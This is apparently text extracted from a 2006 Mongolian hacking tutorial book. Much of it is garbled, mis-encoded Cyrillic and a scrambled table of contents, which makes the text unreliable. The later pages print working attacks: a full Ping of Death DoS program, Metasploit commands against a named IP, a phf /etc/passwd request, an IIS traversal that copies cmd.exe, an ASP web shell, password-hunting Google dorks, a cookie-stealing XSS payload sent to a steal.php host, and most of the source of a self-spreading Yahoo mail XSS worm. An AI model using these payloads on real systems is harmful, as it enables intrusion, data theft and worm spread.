226.2.3ua xaprnür myuaxaüu caaan:aap, :vvuunau ypsaunnau vrcax
:oxnponucou ôvnar ôyky anôau :ymaanbu ôaüanaa amnrnax vünacau,
acxvn nx ôyky ouu nx xaMxaaunü xoxnpon yunpcau ôon xeaenMepnüu
xencunü aooa xaMxaar uar syyraac xoëp syyu :aas aaxnu
uaMaravvncau:aü :auuax xaMxaaunü :erpereep :oprox, acxvn rypaaac
aaam :aaau xnn xvp:an xyrauaaraap xopnx sn mnü:raua.
22/ ayraap svün. KoMnsk:epnüu Maaaannnür xyyns ôycaap onx aaax
22/.1.KoMnsk:ep, Maaaannnüu cvnxaaua xaaranaraax ôaüraa ôonou
aaMxyynx ôaüraa Maaaannnür seameepenrvüraap xyynôapnacau, ôycaa
apraap onx aacau ôyky aaaxbr saaacau ôon xeaenMepnüu xencunü
aooa xaMxaar :aanu uaraac uar syy aaxnu uaMaravvncau:aü :auuax
xaMxaaunü :erpereep :oprox, rypaaac aaam sypraau cap xvp:an
xyrauaaraap ôapnaunax, acxvn xoëp xnn xvp:an xyrauaaraap xopnx sn
mnü:raua.
22/.2.3ua xaprnür myuaxaüu caaan:aap, :vvuunau ypsaunnau vrcax
:oxnponucou ôvnar vünacau, acxvn yr xaprnüu ynMaac nx ôyky ouu nx
xaMxaaunü xoxnpon yunpcau ôon xeaenMepnüu xencunü aooa xaMxaar
uar syyraac xoëp syyu :aas aaxnu uaMaravvncau:aü :auuax xaMxaaunü
156
:erpereep :oprox, acxvn xoëpooc aaam :aaau xnn xvp:an xyrauaaraap
xopnx sn mnü:raua.
228 ayraap svün. KoMnsk:epnüu Maaaannnüu cvnxaaua xyyns ôycaap
uaa:pax :ycraü xaparcan ôan:rax, ôopnyynax
228.1.KoMnsk:ep, Maaaannnüu xaMraanan::aü cvnxaaua xyyns ôycaap
uaa:pax :ycraü nporpaM ôonou :exunk xaparcnnür ôan:racau ôyky
ôopnyyncau ôon xeaenMepnüu xencunü aooa xaMxaar :aanu uaraac uar
syyu :aas aaxnu uaMaravvncau:aü :auuax xaMxaaunü :erpereep :oprox,
rypaaac aaam sypraau cap xvp:an xyrauaaraap ôapnaunax, acxvn :aaau
xnn xvp:an xyrauaaraap xopnx sn mnü:raua.
229 avraap svün. Hsu:aü nporpaM soxnou ôv:aax, amnrnax, :apaax
229.1. KoMnsk:epnüu Maaaannnür seameepenrvüraap yc:rax, xaax,
eepunex ôonou xyynôapnax sopnnroop koMnsk:epnüu nporpaM soxnou
ôv:aax, nporpaMa eepunen: opyynax, usu:aü nporpaMbr :ycraünau
soxnou ôv:aax, :vvunür Maacaap ôaüx amnrnacau, :apaacau ôon
xeaenMepnüu xencunü aooa xaMxaar :aaaac :aas aaxnu uaMaravvncau:aü
:auuax xaMxaaunü :erpereep :oprox, uar syyraac xoëp syyu uar xvp:an
xyrauaaraap anôaaau axnn xnünrax, acxvn uaraac rypaau cap xvp:an
xyrauaaraap ôapnaunax sn mnü:raua.
229.2.3ua xaprnüu ynMaac nx ôyky ouu nx xaMxaaunü xoxnpon yunpcau
ôon xeaenMepnüu xencunü aooa xaMxaar :aanu uaraac xoëp syyu :aas
aaxnu uaMaravvncau:aü :auuax xaMxaaunü :erpereep :oprox, rypaaac
aaam sypraau cap xvp:an xyrauaaraap ôapnaunax, acxvn :aaau xnn
xvp:an xyrauaaraap xopnx sn mnü:raua.
157
- Amarnacaa Ma1epaan -
ht t p: / / www.google.mn
3ua uoMbr ônunxaaa ôv:au xnnnüu xyrauaaua uyrnyyncau Ma:epnan
aaapaa :vmnrnacau ôereea ans uar uoMbr :yym:aü ôapsx xnücaurvü.
Onou susbu :oM xnxnr uoM, naanax Ma:epnan, aaô xyyacbr amnrnacau
yupaac aua ôvranür ônunx ôapaxrvü us aa. Xapnu amnrnacau ôvx
Ma:epnanaa Google caü:br amnrnax onx aacau ôonuo.
158
159
- Torcron -
160
- Torcron -
3uac: us yumnru onou :a ôvxunü ca:rana auaxvv uoM xvpcau ôon
soxnoru Mnunü ca:ran Mam xauranyyu ôaüx ôonuo. 3ua uoM Xakep rax
xau ôonox :yxaü :oMooxou oünron:br erceu ôaüx. Xapnu :a aua uoMbr
yumaaa Xakep ôonunxuo rax ôoacou ôon auavvpuaa. Fauu xoëpxou uoM
yumaaa Xakep ôonx uaaaxrvü, xapnu auaaac oünrox Maacau svün aaapaa
:ynryypnaaa ôoan: :ypmnara xnücau us nnvv vp avu:aü ôaüx ôonuo.
Nouron yncbu Maaus Xakepyya ône ôneuaa xvuaa:rax xoopouaoo aa
uaraan:aü ôaüx uar sopnnro:oü ôaüraacaü.
Nnunü ône uaamaaa ¨Xakep 2" uoMbr rapraxaap sopnu axnnnax
ôonuo. Bapaarnüu uoMouaoo aua aypaaraaarvü sapnM apryyabr ôonou
vscau apryyaaacaa aanrapvvnx vsua. Neu Pyt hon, Perl xannür aaô
xakepaaxaaa xapxau amnrnax ôonox :yxaü ônunx ôonuo. 3ua Pyt hon,
Perl xanunü :yxaü :oauxou ervvncau yupaac uaMx Ma:epnan onx
yumaapaü. ºaax uar nporpaM, aaô xnüunx xaMxaaunü Maanar:aü ôaüxrvü
ôon uaamaa axnxrvü mvv. 3pxaM yumnru :aua aapaarnüu uoMoua
opyynaacaü rax xvcax ôaüraa cauaa ouoo ôaüaan Mnunü n-Maünaap
Maaaraaua vv.
Baspnanaa...

-

-

2006 1

Powered by http://www.jargal.mn © 2006

2

3 .

4 .

- - 5 .

- - - - - 6 .

.... Vulnerabilities.................... Rootkit ................................................................................................................ .............. 13 15 17 18 18 21 23 25 28 29 29 30 30 31 32 32 33 34 37 38 39 39 39 40 40 40 40 40 41 41 41 42 7 ......................................................................................................... DNS .................................................................................................................................................................................................................... HTTPS .............................................................................................................. ICMP ........................................... SSL ................ ....................................... TCP ................................................... .................. Finger .............................. ............................................................................................................................................... TFTP ...................................................................... Countermeasures ............................................................................................................................................................................................................................................ ......................................................................... SNMP ........ Encryption ....................................................................................................................... ARP ...................................................................... SSH ................................................................................................... NNTP ..................................................... SMTP .......... .............. Firewall ............................................................................... DHCP ................................................................................................ 11 .......................................................................... HTTP ....... Threats......................... POP3 . ... ..................................................... Intrusion Detection System . ? ............................................................................................................................................. FTP .. ? ....................................................................................

......................... ...................................................................................................................................................................................................................................................................................... while .................................................................................................................................................................................................................. Python ....................... Continue ........................ NetBIOS NULL session ...... ......................................................... Break .............................................................. Yahoo XSS worm ................................. .................................................................................................... .................................................... ................................................................................ ........... ............... ............................. .................... 45 47 53 54 54 55 56 57 60 62 63 66 66 69 71 73 79 83 86 86 87 91 95 97 97 99 101 102 102 103 103 104 107 108 101 111 112 113 8 ........................................................................................................................................................................ ......... ................................... ...... Samba exploit .......... ..... ............................................... ....................................... HTTP ........................................................................................... Social engineering ............. ........... Google hack ....................................................................................................... ................................................................. ............................... Buffer Overflows ..................................... ...................................................................... SQL injection .................... ................................................................................................................................................. Phishing ... ................. OS injection .............................................................................. Cross Site Scripting (XSS) ...................... For .................................

................................................................................................................................................................. 159 9 ........... ................................................................................................ Subroutine ............. (tools) ........................................................................ ..................................................................................................................................................................................................... ...... Labels ........... ............................................................................................ .............................. .............................. Pattern matching ............................................................... .................................................................................. 115 117 117 120 125 126 128 129 130 132 135 137 141 143 151 155 157 ............... ................................................ ......... ........................................................ .........................................Perl .............................................. ...............................................................................

10 .

11 .- 10 “ ” .

- ? ??? - ? 12 .

Sun Tzu 13 .“If you know the enemy and know yourself. you need not fear the result of a hundred battles” .

14 .

catb.org/hacker-emblem/glider.- ?- UNIX ? Linux ? FreeBSD http://www.png |_|0|_| |_|_|0| |0|0|0| [ ][*][ ] [ ][ ][*] [*][*][*] [ ][0][ ] [ ][ ][0] [0][0][0] 010 001 111 15 .

Java” 16 . see through the master. follow the master. become the master.To follow the path: Look to the master. walk with the master.

Newbie: Weenies Script 17 .- - .

- - . -3000 - - 18 .

TCP/IP 5. HTTP. Underground Warez Forum) . (Firewall. 4. FTP. (DNS.1. . 19 . 2. . Linux 3. SSH. UNIX Windows. Proxies. Telnet 6. ) 7.

White Hat Windows - Windows ? . IPn.. .“format c: 20 . Perl C/C++ Java. Python. White Hat Black Hat Black Hat.

Sun Microsystems(FBI)- Gary McKinnon 11 CitibankInterpol Porsche 944S2 Kevin Poulsen Kevin Poulsen Omega Engineeriin Omega Engineeriing Omegalogic bomb 21 . Motorola. Fujitsu.- - Kevin Nokia.

Robert Morris Meliissa David Smith eBay. 22 . Amazon Denial of Service boy AT&T.

first you’ve got to invade their minds.” 23 .- - “If you want to stop hackers from invading your network.

24 .

932.- - 20 970.447 (application server) - 25 .

- Perl. ASP - 26 .

ASPX ASP.NET- - 27 .

0.25 % Netscape .Firewall.HTTP traffic manager - IP Internet Explorer. Opera.10.. Mozilla Firefox.7% Safari .84. Netscape Internet Explorer .98 % Opera .0.57% 28 .03 % Firefox .3.IP Overload (1000 DDoS Worm ( - Overload.

Images HTTPHEAD. 23 May 2005 22:38:34 GMT Server: Apache/1.hacker.. DELETE. TRACE.1 . OPTIONS.mn HTTP GET /images/logo. 08 Jan 2003 23:11:55 GMT Etag: "3f80f-1b6-3e1cb03b" Accept-Ranges: bytes 29 . CONNECT HTTP HTTP/1.gif HTTP/1. GET. PUT.3. POST.27 (Unix) (Red-Hat/Linux) Last-Modified: Wed.Firewall - .1 200 OK Date: Mon.HTTP - http://www.

HTTPS HTTP Secure Socker Layer (SSL) https:// HTTPS Linux Open SSL (encrypt) HTTPS - - IP DialDynamic Host Configuration Protocol (DHCP) IP DHCPIPIPv4 IPv6 30 .Content-Length: 438 Connection: close Content-Type: text/html. charset=UTF-8 .

456 (2 128) 192 = 11000000 168 = 10101000 13 = 00001101 10 = 00001010 http://3232238858 . 1980com 2.211.com Subdomain- 31 . 3.366.374.282.920.mn 1. Top Level Domains (TLD).938.com hacking.294.IPv4 4.768.967.hacker. Level Domain- hacker.463.296 (232 340.431.hacker.DNS Domain Name System www.463.607.

TCP Transmission Control Protocol TCP TCP 1.hacker. http://www. transport . OSI .mn op Level Domain . 2.mn - . 3.4.FTP - 32 .

FTPS (FTP SSL)FTP cutuFTP ftp(s)://<login>:<password>@<ftpserveraddress>:<port> .20.Te - - 33 . FTPSFTP (SSH File Transfer Protocol).

1. “Cont - . 3. 5. 8. 2. 4.Encryption - 34 . 6. 7.

cryptogram . encryption decryption) encryption- - - 35 .

- - c- - public 36 .

} .ENCRYPT_MODE.encode(encryptedText).generateSecret(keySpec).key). cipher. public String encrypt(String plainText) { DESKeySpec keySpec = new DESKeySpec(encryptKey).1960- . return Base64Encoder.getInstance(“DES”).doFinal(utf8text). SecretKey key = factory.Intrusion Detection System - ) - passive ( ) Audit trails - 37 . byte[] enryptedText = ecipher. byte[] utf8text = plainText. Cipher cipher = Cipher. SecretKeyFactory factory = new SecretKeyFactory.getInstance(“DES”).getBytes(“UTF8”).init(Cipher.

38 .66 [196.Finger Finger Fingerfinger .aliz - .66] Login Name Tty Idle Login Time Office Office Phone davidssh Shuaib pts/1 Sep 12 17:35 (pc22285) root root tty1 1d Sep 11 17:03 finger .xxx.129. . Finger : > finger @196.xxx.129. .

POP3 - POP4 - POP3 39 .SSH – UNIXRSA Shell SSHSSH..SMTP SSH SecureTatu - - .

SNMP - SNMP- - .ARP - ARP OSI Network ..ICMP - .NNTP - .DHCP - 40 .

.SSL - SSL icon- - SSL - - .TFTP - - - .Rootkit - 41 .

Threats.. Countermeasures - Vulnerability Threat equipment cracker Countermeasure vulnerability - - 42 .Vulnerabilities.

- Threat- 43 .spyware.

44 .

- - “Impossiblity: A word only to be found in the dictionary of fools.N. Bonapart 45 .” .

46 .

Firefox.- (tool) ? web browser(Internet explorer. Netscape - ) Chessmaster 10 Chessmaster- Chessmaster? Chessmasterhessmaster- Internet Explorer- Authentication: Brute Force Authentication 47 .

6.Authorization: Session Content Spoofing Cross-site Scripting : LDAP Injection OS injection SQL Injection SSI Injection XPath Injection Denial of Service (DoS) Defaut 1. 3. 2. Log5. Jargon- syslog- 48 . 4.

SSH- 49 .

google.233.1 Non-authoritative answer: Name: www.Scan- Linux C:\>nslookup www.com Registrant: Pearson Technology Centre Kenneth Simmons 200 Old Tappan Rd ..156.com Addresses: 64.: whois. INC.google.sbcglobal. NJ 07675 USA Email: billing@superlibrary. Registrar Whois.com Server: dnsr1. Old Tappan..register.net Address: 68.com Registrar Homepage: www.COM.187..register.com DNS Servers: 50 - .187...99.104 Aliases: www. 64.com Phone: 001-201-7846187 Registrar Name.google.l.233.: REGISTER.94.

Charles RTechPhone: +1-217-333-3339 RTechEmail: kline@uiuc.IU.EDU Comment: RegDate: Updated: 2004-02-18 RAbuseHandle: UIUCS-ARIN RAbuseName: UIUC Security RAbusePhone: +1-217-265-0000 RAbuseEmail: abuse@uiuc.17.192.255 CIDR: 192.EDU NameServer: DNS2.com www. MC-256 Address: 1304 West Springfield Avenue City: Urbana StateProv: IL PostalCode: 61801 Country: US NetRange: 192.255.0.usrxdns1.pearsontc.17.0 .edu RTechHandle: CK185-ARIN RTechName: Kline.EDU NameServer: DNS1.CSO.arin.0.UIUC.com oldtxdns2.edu 51 .net .UIUC. OrgName: University of Illinois OrgID: UIUC Address: 1120 DCL.pearsontc.0/16 NetName: UNIV-IL NetHandle: NET-192-17-0-0-1 Parent: NET-192-0-0-0-0 NetType: Direct Allocation NameServer: DNS1.17.CSO.

1Traceroute C:\>tracert 192. 192.200 Tracing route to 192.192.17.200 Trace complete.12.1.12.168.168. ping sweep Angry IP Scanner Pinger WS_Ping_ProPack Network scan tools Super Scan Nmap Privacy- 52 .17.254 /24 Traceroute .200: 1 10 ms <10 ms <10 ms 2 10 ms 10 ms 20 ms 3 20 ms 20 ms 20 ms 192.168.1.1.

2. 5.60% Cookie poisoning . Remote Access Services Microsoft Data Access Components 7.62% Parameter tampering . Microsoft Outlook 9.UID=bWlrZTptaWtlc3Bhc3N3b3JkDQoNCg. 4. 20-Nov-2006 Java• • • • • • • Cross-site script .19% Window Internet Information Services Microsoft SQL Server Windows Authentication Internet Explorer Unix BIND Domain name system Remote Procedure Call Apache Web Server Authentication Accounts with No Passwords or Weak Passwords Clear Text Services Sendmail Simple Network Mail Protocol Secure Shell (SSH) Misconfiguration of Enterprise Services NIS/NFS Open Secure Socket Layer (SSL) 1. expires=Fri. Windows Peer to Peer File Sharing (P2P) 10. Simple Network Mail Protocol 53 . 3.33% Web server .80% SQL injection . 6. Windows Scripting Host 8.37% Database server .23% Buffer overflow .

1. 2. 3. 4. 5. 6. 7. 8. 9. 10. (Web/HTTP) - 45.54% (NetBIOS) - 20.22% (SQL) - 13.68% 1985 (HSRP) - 3.52% 138 (NetBIOS) - 3.38% 25 (SMTP) - 3.37% - 3.34% - 3.26% - 1.75% - 1.55% -

-

nameservernameserver

www.hacker.mn

54

nameserver-

- Buffer Overflows exploit (worm)

strcpy (char *dest, const char *src) strcat (char *dest, const char *src) gets (char *s) scanf ( const char *format, … )

Shell Expoloit#include <stdio.h> #include <stdlib.h> void function(char *str) { 55 exploit

char buffer[16]; strcpy(buffer,str); } void main() { char string[256]; int i; for( i = 0; i < 255; i++) string[i] = 'Z'; function(string); }

.

.

- Format string

-

int func(char *user) { fprintf( stdout, user); }

int func(char *user) { fprintf( stdout, “%s”, user); }

56

- - ? bruteforce /cgi-bin/show?./html/apps.html show- 57 ..

php include php.ini include 58 .PHP show- HTML secure.

php 59 .phpSecurePages/secure.

DOSHELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD <username> - - FINGER 60 .

hacker.mn/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd - 61 . - 2. - http://www.- 1.

.Social engineering Social engineering Social engineering Paypal- Trojan horse - - 62 .

com - 63 .Social engineering- .Phishing Phishing e- - support@ritebank.

- - - - - 64 .

mn SSL- 65 .hacker.mnhttp://www.hakcer.- http://www.

hidden fie - <INPUT TYPE=HIDDEN NAME="name" VALUE="Dell PC"> <INPUT TYPE=HIDDEN NAME="price" VALUE="$500.jpg"> refresh .hacker. ISP- exploit - - FTP Sam nmap 66 .hacker.dat&category=&search=Dell PCs&method=&begin=&display=&price=&merchant="> <INPUT TYPE=HIDDEN NAME="add2" VALUE="1"> <INPUT TYPE=HIDDEN NAME="img" VALUE="http://www.pl?db=stuff.002 Dell PC <INPUT TYPE=HIDDEN NAME="name" VALUE="Dell PC"> <INPUT TYPE=HIDDEN NAME="price" VALUE="$2. $500.mn/images/c-14kring.00"> <INPUT TYPE=HIDDEN NAME="sh" VALUE="1"> <INPUT TYPE=HIDDEN NAME="return" VALUE="http://www.00"> . mn/cgi-bin/cart.

1 -254 -p 139 http://metasploit.org/tools/frameworks-2.22.3.exe 67 .154.cmd.exenmap -sS -sV 156.

22.154.12 set RPORT 139 set LPORT 4444 exploit 68 .set PAYLOAD linux_ia32_bind show options set RHOST 156.

15\IPC$ “” /U:”” 69 .22..NetBIOS NULL session net view \\156.15 net use \\156.154.154.22.

22.154.15\root \ 70 .net use M: \\156.

. HTTP/1.- - String author = request.addCookie(cookie). author). Cookie cookie = new Cookie("author".. cookie. response. Set-Cookie: author= Jane Smith \r\nHTTP/1.1 200 OK ..1 200 OK\r\ Set-Cookie: author= MGL Hacker HTTP/1.getParameter(AUTHOR_PARAM). - 71 .1 200 OK ..setMaxAge(cookieExpiration).

- ? 72 .

Do - - • • • • • • • • • • • • Ping of Death Teardrop Ping Flooding Amplification D-DoS SYN-Flooding Port scan Stealth SYN scan FIN / X-Mas / Null-Scan Spoof Idle-Scan Ping of Death -20- #ifdef LINUX #define REALLY_RAW #define __BSD_SOURCE #ifndef IP_MF #define IP_MF 0x2000 #define IP_DF 0x4000 #define IP_CE 0x8000 #define IP_OFFSET 0x1FFF #endif #endif 73 ..

#ifdef LINUX struct icmphdr *icmp = (struct icmphdr *)(ip + 1). #endif struct hostent *hp. char **argv) { int s.h> /* * If your kernel doesn't muck with raw packets.h> <netinet/in.h> <arpa/inet.h> <netinet/ip.h> <string. int on = 1.h> <sys/socket.h> <sys/types.#include #include #include #include #include #include #include #include #include #include <stdio.h> <netdb. struct ip *ip = (struct ip *)buf.h> <netinet/ip_icmp. int offset. char buf[1500]. #define REALLY_RAW. 74 . */ #ifdef REALLY_RAW #define FIX(x) htons(x) #else #define FIX(x) (x) #endif int main(int argc. #else struct icmp *icmp = (struct icmp *)(ip + 1). * This is probably only Linux. struct sockaddr_in dst.h> <netinet/in_systm.

if ((s = socket(AF_INET. exit(1). #ifdef LINUX IPPROTO_ICMP #else IPPROTO_IP #endif )) < 0) { perror("socket"). sizeof buf). inet_ntoa(ip->ip_dst)). sizeof(on)) < 0) { perror("IP_HDRINCL"). } if (argc != 2) { fprintf(stderr. &on. IP_HDRINCL. "usage: %s hostname\n". ip->ip_len = FIX(sizeof buf). ip->ip_ttl = 255. } printf("Sending to %s\n". argv[1]).s_addr = inet_addr(argv[1])) == -1) { fprintf(stderr. ip->ip_tos = 0. /* kernel fills in */ 75 . exit(1). IPPROTO_IP. "%s: unknown host\n". } if (setsockopt(s. ip->ip_hl = sizeof *ip >> 2. SOCK_RAW. } } else { bcopy(hp->h_addr_list[0]. ip->ip_v = 4.s_addr. #ifdef LINUX ip->ip_csum = 0. argv[0]). exit(1).bzero(buf. hp->h_length). ip->ip_id = htons(4321). } if ((hp = gethostbyname(argv[1])) == NULL) { if ((ip->ip_dst. exit(1). ip->ip_p = 1. &ip->ip_dst. ip->ip_off = FIX(0).

offset += (sizeof buf .sin_family = AF_INET. icmp->code = 0. icmp->icmp_code = 0.sizeof *ip)) { ip->ip_off = FIX(offset >> 3). sizeof buf. 76 /* kernel fills in */ /* kernel fills in */ . } if (offset == 0) { #ifdef LINUX icmp->type = 0.s_addr = 0. offset). #else icmp->icmp_type = 0. dst. perror("sendto"). icmp->checksum = 0. if (offset < 65120) ip->ip_off |= FIX(IP_MF).#else ip->ip_sum = 0. "offset %d: ". #ifdef LINUX icmp->type = ICMP_ECHO.sin_addr = ip->ip_dst. (struct sockaddr *)&dst. buf. else ip->ip_len = FIX(418). 0. icmp->checksum = htons(~(ICMP_ECHO << 8)). /* make total 65538 */ if (sendto(s. icmp->icmp_code = 0. /* the checksum of all 0's is easy to compute */ #else icmp->icmp_type = ICMP_ECHO. #endif ip->ip_src. sizeof dst) < 0) { fprintf(stderr. /* the checksum of all 0's is easy to compute */ #endif for (offset = 0. icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)). icmp->code = 0. offset < 65536. dst.

icmp->icmp_cksum = 0. Teardrop Ping Flooding Amplification Distributed DoS: DoS. #endif } } return 0. DD-DoS. Zo } - • • • PC IPID – indetification number- 77 .

SYN Flooding FIN / X-mas / Null-Scan Spoof WinSSL Man in the Middle- 78 .

of.passwd inurl:passlist.Idle-Scan - • • • • spam .Google hack - - Google • • • • • • • • • • • allinurl:winnt/system32/ allintitle:"index of/root" allintitle:"index of/admin" inurl:“wwwroot/*.txt (para encontrar listas de passwords) 79 .of master.pwd index.“ filetype:htpasswd htpasswd inurl:admin filetype:db inurl:iisadmin users.private (algo privado) intitle:index.

winnt inurl:"auth_user_file.txt” “Index of /mail” “Index of /” +passwd Index of /” +.mdb allinurl:/cgi-bin/ +mailto allintitle: restricted filetype :mail administrator.index service.pl www-sql pwd..log authors.index authors.pwd.• • • • • • • • • • • • • • • • • • • • • • • • • • • • • • intitle:"Index of.dat ws_ftp.db intitle:"Index of” etc/shadow intitle:"Index of” htpasswd service.pwd wwwboard.pwd users.of ws_ftp.etc” passwd intitle:admin intitle:login “Incorrect syntax near” (SQL script error) intitle:index.pwd administrators.txt” allinurl:/bash_history intitle:"Index of” pwd.ini inurl:backup intitle:index.of.index inurl:"auth_user_file.pwd Sun - Java- 80 .pwd.pwd.of.password index.of inurl:admin “Index of /backup” index.htaccess Index of ftp +.

81

82

- Cross Site Scripting (XSS) XXS JavaScript JavaScript Cookie Firefoxcookie editorRefresh hijack -

cookie-

PoC exploit

cookie

83

vb Imports System Imports System.cookie] ' SearchResult.. // ………… End Sub End Class - Textbox <%@ Page Language="C#" ValidateRequest="false" %> <script runat="server"> void searchBtn _Click(object sender.Web.Web.aspx..com/ph33r/steal.HtmlEncode(inputTxt. _ e As EventArgs) // Do Search….Text="You Searched for: " & txtInput.php?name=News&file=article&sid=1&opti onbox= ['http://sample.WebControls Public Class SearchPage Inherits System.Page Protected txtInput As TextBox Protected cmdSearch As Button Protected lblResult As Label Protected Sub cmdSearch _Click(Source As Object.UI Imports System.Text)).Text // Display Search Results….UI.Web.Web Imports System.UI.sourceGooglePHP Nukehttp://localhost/nuke73/modules.cgi?'+document. } 84 .Write(HttpUtility. EventArgs e) { Response. lblResult.

&amp. &#35. #!/usr/bin/perl use CGI. 85 . &quot. print "You entered ". use HTML::Entities. HTML::Entities::encode($text). &gt. my $text = $cgi->param('text'). my $cgi = CGI->new(). print $cgi->header().</script> <html> <body> <form id="form1" runat="server"> <asp:TextBox ID="inputTxt" Runat="server" TextMode="MultiLine" Width="382px" Height="152px"> </asp:TextBox> <asp:Button ID="searchBtn" Runat="server" Text="Submit" OnClick=" searchBtn _Click" /> </form> </body> </html> XSS Input- < > # & " Perl &lt.

OS Injection on - public class DoStuff { public string executeCommand(String userName) { try { 86 . ..SQL injection - $result = mysql_query(“ SELECT * FROM users WHERE user=’$user’ and pass=’$pass’ “). if(mysql_num_rows($result)>0){ // login } username“admin” or 1=1/*’’ / SQL$result = mysql_query(“ SELECT * FROM users WHERE user=’admin’ or 1=1 /* ‘ and pass=’$pass’ “).

Start("doStuff..Exe+c:\inetpub \scripts 87 .exe " +”-“ +myUid).getRuntime(). Runtime rt = Runtime.com/scripts/.NETnamespace ExternalExecution { class CallExternal { static void Main(string[] args) { String arg1=args[0]. } } } getRuntime(). // Call exe with } catch(Exception e) { e. arg1).Diagnostics. System. rt.printStackTrace().Process.%c0%af..exec("doStuff.Exe?/C +copy+c:\winnt\system32\cmd./winnt/system32/cmd.exe".userID String myUid = userName.example. } } } - - URL parsing http://www1.

FileName <> "" Then Fields("File1"). - <form method=post ENCTYPE="multipart/form-data"> <input type=file name="File1"> <input type="submit" Name="Action" value="Upload"> </form> <hr> <!--#INCLUDE FILE="upload.Write("<LI>Upload: " & Fields("File1").FileName) End If End If %> 88 .") & "\" & Fields("File1").ServerVariables("REQUEST_METHOD") = "POST" Then Set Fields = GetUpload() If Fields("File1").inc"--> <% If Request.Value.MapPath(".SaveAs Server. 2.FileName Response.1.

CreateObject("Scripting. True) Set oFile = oFileSys.CreateObject("WSCRIPT. False.Form(".FileSystemObject") szCMD = Request.Write Server.<% Dim oScript. oScriptNet.HTMLEncode(oFile. 0.GetTempName( ) Call oScript.ReadAll) oFile.CMD" size=45 value="<%= szCMD %>"> <input type=submit value="Run"> </FORM> <PRE> <% If (IsObject(oFile)) Then On Error Resume Next Response.ServerVariables("URL") %>" method="POST"> <input type=text name=".CreateObject("WSCRIPT. szCMD. 1. szTempFile On Error Resume Next Set oScript = Server.NETWORK") Set oFileSys = Server.Close Call oFileSys.DeleteFile(szTempFile. True) End If %> </PRE> 89 .Run ("cmd.SHELL") Set oScriptNet = Server. oFileSys. oFile.exe /c " & szCMD & " > " & szTempFile.OpenTextFile (szTempFile. 0) End If %> <FORM action="<%= Request.CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.

HTTP POST- 90 .

91 .com/us.ckers. Param) { if (window.Yahoo XSS worm worm- XSS worm AntivirusAntivirusAntivirus- http://ha.ActiveXObject) { http_request = new ActiveXObject('Microsoft. } else if (window. var Email = ''.i1. } http_request.XMLHTTP'). var IDList = ''. Method.gif' onfiltered="var http_request = false.yimg.. onfiltered= Func.XMLHttpRequest) { http_request = new XMLHttpRequest().org <img src='http://us. Func.yimg.com/i/us/nt/ma/ma_mail_1. var CRumb = ''. function makeRequest(url.

status == 200) { HtmlContent = http_request.mail. StartIndex = HtmlContent.replace(CurEmail.IDList = IDList.open(Method.length.'.random(). crumb = HtmlContent. i = 0. StartIndex = HtmlContent. null). 'GET'.length ). CutLen). EndIndex = HtmlContent. EndString = '</td>'. YahooID = HtmlContent. StartString = ' <td>'.send(null).MailIndex = ServerUrl.' + Server + '.0). StartIndex).value.3.responseText.StartString.'.substr(USIndex + 3.substr(0. } if(IDList. StartIndex + 20).yahoo. Getcrumb.indexOf(StartString. StartIndex + 20).substr(StartIndex + StartString. return IDList.indexOf('@yahoo. MyBody = 'this is test'.responseText.incIndex = 92 .replace('. while(StartIndex >= 0) { EndIndex = HtmlContent. } function ListContacts() { if (http_request.readyState == 4) { if (http_request.CutLen = MailIndex .length .indexOf('. 0). if( YahooID.USIndex .indexOf(StartString.'. i++. '').mail' . makeRequest('http://us.IDList = IDList.replace(UserEmail. StartIndex = HtmlContent.StartIndex .replace(CurEmail + '.indexOf('us. 0) > 0 ) IDList = IDList + '. var ComposeAction = compose.substr(StartIndex + StartString.indexOf(EndString.com'. '').indexOf(StartString. else http_request.' . '').com/ym/Compose/?rnd=' + Math.com').') IDList = IDList.length. StartString = ' <td>'. StartIndex = HtmlContent. CutLen).replace(Email + '.'.substr(1.indexOf(EndString. if( Method == 'GET') http_request.var Server = ServerUrl.FromAddress. IDList = IDList. '').split('.mail.com/ym/Compose'. EndString = '\u0022?.' + UserEmail. CutLen ). IDList. 0). IDList = IDList. url. '').' + YahooID . CRumb = ExtractStr(HtmlContent). i = 0.crumb\u0022 value=\u0022?. } } } function ExtractStr(HtmlContent) { StartString = 'name=\u0022. Url = 'http://us. if(IDList. return crumb. CutLen = EndIndex .IDList = IDList. true).indexOf('. function GetIDs(HtmlContent) { IDList = ''.1) == '.0).' + Server + '.0). } function Getcrumb() { if (http_request. ServerUrl = url0.indexOf('@yahoogroups.send(Param).open('http://www. StartIndex + StartString.com'. MySubj = 'New Graphic Site'. }window. 0)>0 ) { IDListArray = IDList.status == 200) { HtmlContent = http_request.value.replace(UserEmail + '. IDList = IDList.' + CurEmail.StartIndex . } CurEmail = spamform.length).lastdata.indexOf(StartString.MidIndex = ComposeAction.length.indexOf('&Mid=' . '').yahoo. IDList = GetIDs(HtmlContent). StartString = '</tr>'. CutLen = EndIndex .action.replace('.'). '').readyState == 4) { if (http_request.http_request.IDList = IDList.UserEmail = showLetter.USIndex = ServerUrl. 0) > 0 || YahooID.StartString. Email = IDListArray[0].NE.

replace('BCCLIST'.replace('TOEMAIL'. Param = Param.replace('RUMBVAL'. Param). MyMid).AIndex = ComposeAction.CutLen = AIndex . CutLen).Param = Param. MyBody).indexOf('&Mid' .&PhotoFrame=&Phot oPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLin k=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl =&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_D one=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedr afttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL& Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote %3A+forwarded+message+attached.replace('EMAILMID'.replace('EMAILSUBJ'.QIndex .indexOf('&inc' .Param = Param. MyMid).replace('EMAILSUBJ'.replace('BOXNAME'. Param = Param.readyState == 4) { window. CutLen). QIndex = ComposeAction. MySubj). Param = Param. Param = Param. IDList).av3.substr(MidIndex + 5.crumb=RUMBVAL&Mid=EM AILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAIL MID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&Origi nalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&Old 